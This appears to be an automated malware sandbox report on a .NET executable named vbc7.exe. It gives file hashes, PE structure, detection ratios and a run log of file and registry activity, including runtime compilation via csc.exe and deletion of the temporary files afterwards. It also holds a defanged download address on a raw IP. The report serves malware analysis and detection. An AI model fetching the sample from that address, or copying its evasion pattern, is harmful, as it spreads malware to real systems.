MalScore
100/100
MalFamily
Malicious

vbc7.exe

File details
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 211.00 KB (216064 bytes)
Compile time: 2018-04-26 18:52:48
MD5: 1e1ae714a78d5672d7c6c1abd1bb75b6
SHA1: e5fde5dcba9b86f3fc52f958a0c69aa08351a271
SHA256: a6fe913594a4bd9f2a134d29fb4c8f6be7ab6b58e95004f6e8ae2736812577e5
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-04-27 09:27:03
Last submission: 2018-04-27 09:27:03
Filename detected: - vbc7.exe (1)
URL file hosting
hXXp://23.249.161.109/c/vbc7.exe
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-04-27 06:08:54 [21/68] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x2bc4 11264 a59b4e0a85afa92ae876055d7fd16c8f 39d94de55c214a2ac607f1a664c013d5817ff403
.rsrc 0x6000 0x31a96 203776 61cd862cdbf807b17f3ca60fcf9a26c8 a4cc13497b06755f09759bf595930fa4cfb9f060
.reloc 0x38000 0xc 512 9fb94b98cec971d88bc12e68c4f73347 f299ca17a34afb372f50763e71bd7e510e22dc11
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x6a50 1384 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x6fb8 34 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x6fdc 652 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_HTML 0x7268 198212 LANG_GERMAN SUBLANG_GERMAN
RT_MANIFEST 0x378ac 490 LANG_NEUTRAL SUBLANG_NEUTRAL
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright:
Assembly Version: 0.0.0.0
InternalName: DdlvB7wF9H2w7TrM.Program.exe
FileVersion: 0.0.0.0
FileDescription:
Translation: 0x0000 0x04b0
OriginalFilename: DdlvB7wF9H2w7TrM.Program.exe
ProductVersion: 0.0.0.0
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
File type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven03b_64 Seven03b_64 VirtualBox 2018-04-27 09:24:08 2018-04-27 09:26:58 170

9 Behaviors detected by system signatures

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe.config
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\DdlvB7wF9H20c8d1789#\*
C:\Users\Seven01\AppData\Local\Temp\vbc7.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.tmp
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.0.cs
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.out
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.err
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\it\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\GAC_64
C:\Windows\assembly\GAC_64\mscorlib.resources
C:\Windows\assembly\GAC_32
C:\Windows\assembly\GAC_32\mscorlib.resources
C:\Windows\assembly\GAC_MSIL
C:\Windows\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\*
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC
C:\Windows\assembly\GAC\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_64
C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_32
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC_MSIL
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\mscorlib.resources
C:\Windows\Microsoft.Net\assembly\GAC
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp
C:\Windows\System32\tzres.dll
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe.config
C:\Users\Seven01\AppData\Local\Temp\vbc7.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
C:\Windows\SysWOW64\it-IT\KERNELBASE.dll.mui
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp
C:\Windows\System32\tzres.dll
C:\Windows\SysWOW64\ntdll.dll

Write Files

C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.tmp
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.0.cs
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.out
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.err
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP
C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp

Delete Files

C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.0.cs
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.pdb
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.out
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.cmdline
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.dll
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.err
C:\Users\Seven01\AppData\Local\Temp\d3vyvw2y.tmp
C:\Users\Seven01\AppData\Local\Temp\RESA8D2.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC3512F922DB724C4A9685D61DB0536B18.TMP

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vbc7.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Classes\AppID\vbc7.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\OLE\AppCompat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission
HKEY_CURRENT_USER\Software\Classes\Interface\{00000134-0000-0000-C000-000000000046}
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default)
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledProcesses\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F570307C
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\DisabledSessions\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Numerics__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Deployment__b03f5f7f11d50a3a
